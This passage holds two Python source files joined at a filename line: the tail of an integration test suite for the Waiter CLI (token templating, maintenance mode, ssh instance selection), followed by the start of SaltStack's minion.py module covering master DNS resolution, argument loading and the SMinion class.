cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', **{f'{action}_flags': flags})
self.assertEqual(1, cp.returncode, cp.stderr)
stderr = cli.stderr(cp)
err_msg = 'Provided context file must evaluate to a dictionary, instead it is foo-bar'
self.assertIn(err_msg, stderr)
finally:
# the token should not have been created, but cleaning up in case the test failed
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_create_token_context_bad_format_failure_json_data(self):
self.__test_create_update_token_context_bad_format_failure('create', 'json')
def test_create_token_context_bad_format_failure_yaml_data(self):
self.__test_create_update_token_context_bad_format_failure('create', 'yaml')
def test_update_token_context_bad_format_failure_json_data(self):
self.__test_create_update_token_context_bad_format_failure('update', 'json')
def test_update_token_context_bad_format_failure_yaml_data(self):
self.__test_create_update_token_context_bad_format_failure('update', 'yaml')
def __test_create_update_token_context_success(self, action, file_format):
token_name = self.token_name()
context_fields = {'fee': 'bar', 'fie': 'baz', 'foe': 'fum'}
token_fields = {'cmd': '${fee}-${fie}', 'cpus': 0.2, 'mem': 256, 'metadata': {'foe': '${foe}'}}
try:
if action == 'update':
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128})
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
with cli.temp_token_file({**token_fields}, file_format) as token_path:
with cli.temp_token_file({**context_fields}, 'yaml') as context_path:
flags = f'--context {context_path} --{file_format} {token_path}'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', **{f'{action}_flags': flags})
self.assertEqual(0, cp.returncode, cp.stderr)
stdout = cli.stdout(cp)
out_msg = f'Successfully {action}d {token_name}'
self.assertIn(out_msg, stdout)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual('bar-baz', token_data['cmd'])
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual({'foe': 'fum'}, token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_token_context_success_json_data(self):
self.__test_create_update_token_context_success('create', 'json')
def test_create_token_context_success_yaml_data(self):
self.__test_create_update_token_context_success('create', 'yaml')
def test_update_token_context_success_json_data(self):
self.__test_create_update_token_context_success('update', 'json')
def test_update_token_context_success_yaml_data(self):
self.__test_create_update_token_context_success('update', 'yaml')
def __test_create_update_token_context_missing_variable_failure(self, action, file_format):
token_name = self.token_name()
context_fields = {'fee': 'bar', 'fie': 'baz'}
token_fields = {'cmd': '${fee}-${fie}-${foe}', 'cpus': 0.2, 'mem': 256, 'metadata': {'foe': '${foe}'}}
try:
if action == 'update':
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128})
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
with cli.temp_token_file({**token_fields}, file_format) as token_path:
with cli.temp_token_file({**context_fields}, 'yaml') as context_path:
flags = f'--context {context_path} --{file_format} {token_path}'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', **{f'{action}_flags': flags})
self.assertEqual(1, cp.returncode, cp.stderr)
stderr = cli.stderr(cp)
err_msg = "Error when processing template: missing variable 'foe'"
self.assertIn(err_msg, stderr)
finally:
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_create_token_context_missing_variable_failure_json_data(self):
self.__test_create_update_token_context_missing_variable_failure('create', 'json')
def test_create_token_context_missing_variable_failure_yaml_data(self):
self.__test_create_update_token_context_missing_variable_failure('create', 'yaml')
def test_update_token_context_missing_variable_failure_json_data(self):
self.__test_create_update_token_context_missing_variable_failure('update', 'json')
def test_update_token_context_missing_variable_failure_yaml_data(self):
self.__test_create_update_token_context_missing_variable_failure('update', 'yaml')
def __test_create_update_token_context_override_variable_success(self, action, file_format):
token_name = self.token_name()
context_fields = {'fee': 'bar', 'fie': 'baz'}
token_fields = {'cmd': '${fee}-${fie}-${foe}', 'cpus': 0.2, 'mem': 256, 'metadata': {'foe': '${foe}'}}
try:
if action == 'update':
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128})
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
with cli.temp_token_file({**token_fields}, file_format) as token_path:
with cli.temp_token_file({**context_fields}, 'yaml') as context_path:
flags = f'--context {context_path} --context.fie box --context.foe fum --{file_format} {token_path}'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', **{f'{action}_flags': flags})
self.assertEqual(0, cp.returncode, cp.stderr)
stdout = cli.stdout(cp)
out_msg = f'Successfully {action}d {token_name}'
self.assertIn(out_msg, stdout)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual('bar-box-fum', token_data['cmd'])
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual({'foe': 'fum'}, token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_create_token_context_override_variable_success_json_data(self):
self.__test_create_update_token_context_override_variable_success('create', 'json')
def test_create_token_context_override_variable_success_yaml_data(self):
self.__test_create_update_token_context_override_variable_success('create', 'yaml')
def test_update_token_context_override_variable_success_json_data(self):
self.__test_create_update_token_context_override_variable_success('update', 'json')
def test_update_token_context_override_variable_success_yaml_data(self):
self.__test_create_update_token_context_override_variable_success('update', 'yaml')
def run_maintenance_start_test(self, cli_fn, start_args='', ping_token=False):
token_name = self.token_name()
token_fields = util.minimal_service_description()
custom_maintenance_message = "custom maintenance message"
util.post_token(self.waiter_url, token_name, token_fields)
try:
if ping_token:
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Pinging token', cli.stdout(cp))
self.assertIn('successful', cli.stdout(cp))
util.wait_until_services_for_token(self.waiter_url, token_name, 1)
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli_fn(token_name, self.waiter_url, maintenance_flags=f'{start_args} "{custom_maintenance_message}"')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Maintenance mode activated', cli.stdout(cp))
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual({'message': custom_maintenance_message}, token_data['maintenance'])
for key, value in token_fields.items():
self.assertEqual(value, token_data[key])
if ping_token:
num_services = 1 if '--no-kill' in start_args else 0
self.assertEqual(num_services,
len(util.wait_until_services_for_token(self.waiter_url, token_name, num_services)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_maintenance_start_basic(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'))
def test_maintenance_start_no_service_ask_kill(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'), start_args='--ask-kill')
def test_maintenance_start_no_service_force_kill(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'), start_args='--force-kill')
def test_maintenance_start_no_service_no_kill(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'), start_args='--no-kill')
def test_maintenance_start_ping_service_ask_kill(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'), start_args='--ask-kill', ping_token=True)
def test_maintenance_start_ping_service_force_kill(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'), start_args='--force-kill', ping_token=True)
def test_maintenance_start_ping_service_no_kill(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'), start_args='--no-kill', ping_token=True)
def test_maintenance_start_nonexistent_token(self):
token_name = self.token_name()
custom_maintenance_message = "custom maintenance message"
cp = cli.maintenance('start', token_name, self.waiter_url,
maintenance_flags=f'"{custom_maintenance_message}"')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('The token does not exist. You must create it first.', cli.stderr(cp))
def test_maintenance_start_no_cluster(self):
custom_maintenance_message = "custom maintenance message"
self.__test_no_cluster(partial(cli.maintenance, 'start',
maintenance_flags=f'"{custom_maintenance_message}"'))
def run_maintenance_stop_no_ping_test(self, cli_fn):
token_name = self.token_name()
token_fields = {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'}
custom_maintenance_message = "custom maintenance message"
util.post_token(self.waiter_url, token_name,
{**token_fields, 'maintenance': {'message': custom_maintenance_message}})
try:
cp = cli_fn(token_name, self.waiter_url, maintenance_flags='--no-ping')
self.assertEqual(0, cp.returncode, cp.stderr)
stdout = cli.stdout(cp)
self.assertNotIn(f'Pinging token {token_name}', stdout)
self.assertNotIn('Ping successful', stdout)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(None, token_data.get('maintenance', None))
for key, value in token_fields.items():
self.assertEqual(value, token_data[key])
finally:
util.delete_token(self.waiter_url, token_name)
def test_maintenance_stop_no_ping(self):
self.run_maintenance_stop_no_ping_test(partial(cli.maintenance, 'stop'))
def run_maintenance_stop_with_ping_test(self, cli_fn):
token_name = self.token_name()
token_fields = util.minimal_service_description()
custom_maintenance_message = "custom maintenance message"
util.post_token(self.waiter_url, token_name,
{**token_fields, 'maintenance': {'message': custom_maintenance_message}})
try:
cp = cli_fn(token_name, self.waiter_url)
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Pinging token {token_name}', stdout)
self.assertIn('Ping successful', stdout)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(None, token_data.get('maintenance', None))
for key, value in token_fields.items():
self.assertEqual(value, token_data[key])
self.assertEqual(1, len(util.wait_until_services_for_token(self.waiter_url, token_name, 1)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_maintenance_stop_with_ping(self):
self.run_maintenance_stop_with_ping_test(partial(cli.maintenance, 'stop'))
def run_maintenance_stop_with_ping_no_wait_test(self, cli_fn):
token_name = self.token_name()
token_fields = util.minimal_service_description()
token_fields['cmd'] = f"sleep 30 && {token_fields['cmd']}"
custom_maintenance_message = "custom maintenance message"
util.post_token(self.waiter_url, token_name,
{**token_fields, 'maintenance': {'message': custom_maintenance_message}})
try:
cp = cli_fn(token_name, self.waiter_url, maintenance_flags='--no-wait')
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Pinging token {token_name}', stdout)
self.assertIn('Service is currently Starting', stdout)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(None, token_data.get('maintenance', None))
for key, value in token_fields.items():
self.assertEqual(value, token_data[key])
self.assertEqual(1, len(util.wait_until_services_for_token(self.waiter_url, token_name, 1)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_maintenance_stop_with_ping_no_wait(self):
self.run_maintenance_stop_with_ping_no_wait_test(partial(cli.maintenance, 'stop'))
def test_maintenance_stop_no_cluster(self):
self.__test_no_cluster(partial(cli.maintenance, 'stop'))
def run_maintenance_stop_enforce_check_not_in_maintenance_test(self, cli_fn):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'})
try:
cp = cli_fn(token_name, self.waiter_url, maintenance_flags='--check')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Token is not in maintenance mode', cli.stderr(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_maintenance_stop_enforce_check_not_in_maintenance(self):
self.run_maintenance_stop_enforce_check_not_in_maintenance_test(partial(cli.maintenance, 'stop'))
def run_maintenance_stop_skip_check_not_in_maintenance_test(self, cli_fn):
token_name = self.token_name()
token_fields = util.minimal_service_description()
util.post_token(self.waiter_url, token_name, token_fields)
try:
cp = cli_fn(token_name, self.waiter_url)
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Token {token_name} does not have maintenance mode activated', stdout)
self.assertIn(f'Pinging token {token_name}', stdout)
self.assertIn('Service is currently Running', stdout)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(None, token_data.get('maintenance', None))
for key, value in token_fields.items():
self.assertEqual(value, token_data[key])
self.assertEqual(1, len(util.wait_until_services_for_token(self.waiter_url, token_name, 1)))
finally:
util.delete_token(self.waiter_url, token_name)
def test_maintenance_stop_skip_check_not_in_maintenance(self):
self.run_maintenance_stop_skip_check_not_in_maintenance_test(partial(cli.maintenance, 'stop'))
def __test_maintenance_check(self, maintenance_active):
token_name = self.token_name()
output = f'{token_name} is {"" if maintenance_active else "not "}in maintenance mode'
cli_return_code = 0 if maintenance_active else 1
if maintenance_active:
util.post_token(self.waiter_url, token_name,
{'cpus': 0.1, 'mem': 128, 'cmd': 'foo', 'maintenance': {'message': 'custom message'}})
else:
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'})
try:
cp = cli.maintenance('check', token_name, self.waiter_url)
self.assertEqual(cli_return_code, cp.returncode, cp.stderr)
self.assertIn(output, cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_maintenance_check_not_in_maintenance_mode(self):
self.__test_maintenance_check(False)
def test_maintenance_check_in_maintenance_mode(self):
self.__test_maintenance_check(True)
def test_maintenance_no_sub_command(self):
cp = cli.maintenance('', '')
cp_help = cli.maintenance('', '', maintenance_flags='-h')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(cli.stdout(cp_help), cli.stdout(cp))
def __test_ssh(self, get_possible_instances_fn, command_to_run=None, stdin=None, min_instances=1, admin=False,
ssh_flags=None, container_name=None, is_failed_instance=False, test_service=False,
test_instance=False, multiple_services=False, quick=False, expect_no_data=False,
expect_no_instances=False, expect_out_of_range=False):
token_name = self.token_name()
token_fields = util.minimal_service_description()
token_fields['min-instances'] = min_instances
if is_failed_instance:
token_fields['cmd'] = 'this_is_an_invalid_command'
try:
if multiple_services:
token_new_fields = util.minimal_service_description()
util.post_token(self.waiter_url, token_name, token_new_fields)
util.ping_token(self.waiter_url, token_name)
util.post_token(self.waiter_url, token_name, token_fields)
service_id = util.ping_token(self.waiter_url, token_name,
expected_status_code=503 if is_failed_instance else 200)
if is_failed_instance:
goal_fn = lambda insts: 0 < len(insts['failed-instances']) and \
0 == len(insts['killed-instances'])
else:
goal_fn = lambda insts: min_instances == len(insts['active-instances']) and \
0 == len(insts['failed-instances']) and \
0 == len(insts['killed-instances'])
util.wait_until_routers_service(self.waiter_url, service_id, lambda service: goal_fn(service['instances']))
instances = util.instances_for_service(self.waiter_url, service_id)
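# Pointing WAITER_SSH/WAITER_KUBECTL at `echo` (presumably) makes the CLI print the
# command it would have executed instead of opening a real session, so the chosen
# instance can be detected from stdout below.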
env = os.environ.copy()
env['WAITER_SSH'] = 'echo'
env['WAITER_KUBECTL'] = 'echo'
if admin:
env['WAITER_ADMIN'] = 'true'
possible_instances = get_possible_instances_fn(service_id, instances)
ssh_flags = [ssh_flags] if ssh_flags else []
if quick:
ssh_flags.append('-q')
if container_name:
ssh_flags.append(f'--container-name {container_name}')
if test_instance:
possible_instances = possible_instances[0:1]
ssh_dest = possible_instances[0]['id']
ssh_flags.append('-i')
elif test_service:
ssh_dest = service_id
ssh_flags.append('-s')
else:
ssh_dest = token_name
cp = cli.ssh(self.waiter_url, ssh_dest, stdin=stdin, ssh_command=command_to_run,
ssh_flags=' '.join(ssh_flags),
env=env)
stdout = cli.stdout(cp)
if expect_out_of_range:
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Input is out of range!', cli.stderr(cp))
elif expect_no_data:
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', stdout)
elif expect_no_instances:
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn(f'There are no relevant instances using service id {service_id}', stdout)
else:
self.assertEqual(0, cp.returncode, cp.stderr)
ssh_instance = util.get_ssh_instance_from_output(self.waiter_url, possible_instances, stdout,
container_name=container_name,
command_to_run=command_to_run)
self.assertIsNotNone(ssh_instance,
msg=f"None of the possible instances {possible_instances} were detected in ssh "
f"command output: \n{stdout}")
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_ssh_instance_id(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], test_instance=True)
def test_ssh_instance_id_failed_instance(self):
self.__test_ssh(lambda _, instances: instances['failed-instances'], is_failed_instance=True,
test_instance=True)
def test_ssh_instance_id_custom_cmd(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], test_instance=True,
command_to_run='ls -al')
def test_ssh_instance_id_custom_cmd_failed_instance(self):
self.__test_ssh(lambda _, instances: instances['failed-instances'], is_failed_instance=True,
test_instance=True, command_to_run='ls -al')
def test_ssh_instance_id_no_instance(self):
self.__test_ssh(lambda service_id, _: [{'id': service_id + '.nonexistent'}], test_instance=True,
expect_no_data=True)
def test_ssh_instance_id_no_service(self):
instance_id_no_service = "a.a"
cp = cli.ssh(self.waiter_url, instance_id_no_service, ssh_flags='-i')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
def test_ssh_service_id_single_instance(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], test_service=True)
def test_ssh_service_id_no_relevant_instances(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], test_service=True,
ssh_flags='--no-active', expect_no_instances=True)
def test_ssh_service_id_multiple_instances(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], min_instances=2,
stdin='1\n'.encode('utf8'), test_service=True)
def test_ssh_service_id_invalid_prompt_input(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], min_instances=2,
stdin='-123\n'.encode('utf8'), test_service=True, expect_out_of_range=True)
def test_ssh_service_id_non_existent_service(self):
service_id = "nonexistent"
cp = cli.ssh(self.waiter_url, service_id, ssh_flags='-s')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
def test_ssh_service_id_quick(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], min_instances=2, test_service=True,
quick=True)
def test_ssh_token_single_instance(self):
self.__test_ssh(lambda _, instances: instances['active-instances'])
def test_ssh_token_multiple_services_sorted(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], stdin='1\n'.encode('utf8'),
multiple_services=True)
def test_ssh_token_multiple_instances(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], min_instances=2,
stdin='1\n'.encode('utf8'))
def test_ssh_token_multiple_services_instances(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], min_instances=2, multiple_services=True,
stdin='1\n1\n'.encode('utf8'))
def test_ssh_token_multiple_services_instances_quick(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], min_instances=2, multiple_services=True,
quick=True)
def test_ssh_token_custom_container(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], admin=True,
container_name='waiter-files')
def test_ssh_token_invalid_token(self):
token_name = "nonexistent"
cp = cli.ssh(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
def test_ssh_token_invalid_token_quick(self):
token_name = "nonexistent"
cp = cli.ssh(self.waiter_url, token_name, ssh_flags='-q')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('The token does not exist. You must create it first.', cli.stderr(cp))
def __test_ssh_token_no_services(self, ssh_flags=None):
token_name = self.token_name()
token_fields = util.minimal_service_description()
util.post_token(self.waiter_url, token_name, token_fields)
try:
cp = cli.ssh(self.waiter_url, token_name, ssh_flags=ssh_flags)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn(f'There are no services using token {token_name}', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_ssh_token_no_services(self):
self.__test_ssh_token_no_services()
def test_ssh_token_no_services_quick(self):
self.__test_ssh_token_no_services(ssh_flags='-q')
def test_start_no_cluster(self):
self.__test_no_cluster(partial(cli.start))
def test_start_no_ping(self):
self.run_maintenance_stop_no_ping_test(cli.start)
def test_start_with_ping(self):
self.run_maintenance_stop_with_ping_test(cli.start)
def test_start_with_ping_no_wait(self):
self.run_maintenance_stop_with_ping_no_wait_test(cli.start)
def test_start_enforce_check_not_in_maintenance(self):
self.run_maintenance_stop_enforce_check_not_in_maintenance_test(cli.start)
def test_start_skip_check_not_in_maintenance(self):
self.run_maintenance_stop_skip_check_not_in_maintenance_test(cli.start)
def test_stop_no_cluster(self):
custom_maintenance_message = "custom maintenance message"
self.__test_no_cluster(partial(cli.stop, maintenance_flags=f'"{custom_maintenance_message}"'))
def test_stop_basic(self):
self.run_maintenance_start_test(cli.stop)
def test_stop_no_service_ask_kill(self):
self.run_maintenance_start_test(cli.stop, start_args='--ask-kill')
def test_stop_no_service_force_kill(self):
self.run_maintenance_start_test(cli.stop, start_args='--force-kill')
def test_stop_no_service_no_kill(self):
self.run_maintenance_start_test(cli.stop, start_args='--no-kill')
def test_stop_ping_service_ask_kill(self):
self.run_maintenance_start_test(cli.stop, start_args='--ask-kill', ping_token=True)
def test_stop_ping_service_force_kill(self):
self.run_maintenance_start_test(cli.stop, start_args='--force-kill', ping_token=True)
def test_stop_ping_service_no_kill(self):
self.run_maintenance_start_test(cli.stop, start_args='--no-kill', ping_token=True)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import multiprocessing
from random import shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit
)
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
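# Illustrative usage sketch (the config path is an assumption, and the Minion class
# with its tune_in() loop is presumably defined later in this module):
#
#   import salt.config
#   import salt.minion
#
#   opts = salt.config.minion_config('/etc/salt/minion')
#   minion = salt.minion.Minion(opts)
#   minion.tune_in()   # authenticate, connect to the publisher, handle publications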
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
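# The dict built below looks roughly like (values illustrative):
#   {'master_ip': '10.0.0.1', 'master_uri': 'tcp://10.0.0.1:4506'}
# where the port comes from opts['master_port'].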
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
err = 'Master address: {0} could not be resolved. Invalid or unresolvable address.'.format(
opts.get('master', 'Unknown'))
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional keyword arguments are handled:
mode: anything os.makedirs would accept as a mode.
uid: the uid to set; if it is not set, None, or -1, no changes are
made. The same applies if the directory is already owned by this
uid. Must be an int. Works only on unix/unix-like systems.
gid: the gid to set; if it is not set, None, or -1, no changes are
made. The same applies if the directory is already owned by this
gid. Must be an int. Works only on unix/unix-like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So let's check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
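# Illustrative usage sketch (hypothetical paths and values): the proc
# directory is created under the cachedir and mode/ownership are only
# adjusted when explicitly requested, e.g.
#     get_proc_dir('/var/cache/salt/minion')
#     # -> '/var/cache/salt/minion/proc'
#     get_proc_dir('/var/cache/salt/minion', mode=0o700, uid=0, gid=0)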
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_input()
# above; that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs, or the parsed keyword name is
# one of the function's positional arguments.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then it's a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs, or the keyword name is one of
# the function's positional arguments.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
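# Illustrative sketch (hypothetical function and values): plain strings stay
# positional, dicts flagged with __kwarg__ become keyword arguments, and
# unknown keyword names raise SaltInvocationError, e.g.
#     load_args_and_kwargs(some_func, ['web01', {'__kwarg__': True, 'timeout': 5}])
#     # -> (['web01'], {'timeout': 5})   assuming some_func accepts 'timeout'
# When some_func accepts **kwargs and publish data is passed in, the data is
# packed in as additional '__pub_<key>' keyword arguments.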
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners, etc. The SMinion allows developers to
generate all of the salt minion functions and have them readily
available for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Resolve the master(s) and load the minion modules when a remote
# file client (or use_master_when_local) is in use
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules(initial_load=True)
else:
